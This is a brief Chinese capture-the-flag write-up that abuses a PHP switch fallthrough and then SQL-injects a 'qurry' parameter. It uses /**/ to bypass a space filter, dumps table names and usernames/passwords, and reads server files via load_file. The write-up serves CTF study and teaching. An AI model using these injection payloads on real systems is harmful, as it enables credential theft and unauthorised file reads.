打开题目,出现如下界面,get传参c,sleep($c)会使界面sleep传入的c的时间,并且发现,在case 3下面并没有break来终止case,而是会接着执行case 6000000
所以我们直接传入c=3
得到信息,打开该文件,发现有一个登录框,但是登录框的参数会传入get参数qurry,尝试注入
在qurry处传入-1/**/union/**/select /**/database()此处过滤了空格
得到数据为web,接着在qurry处传入下面的注入语句来获取表名 -1/**/union/**/select/**/group_concat(table_name)/**/from/**/information_schema.`tables`/**/where/**/table_schema=database
在qurry处输入如下sql语句来获取字段-1/**/union/**/select/**/group_concat(id,username,password)/**/from/**/conte
但是字段里面并没有爆出flag,但是一直出现secret,猜测flag在secret.php文件中,可以使用mysql中的load_flie(‘‘)来读取文件,在qurry处传入,来读取文件-1/**/union/**/select/**/load_file('/var/www/html/secret.php')
打开f12,网页源码显示real……..
传入-1/**/union/**/select/**/load_file('/real_flag_is_here')来读取文件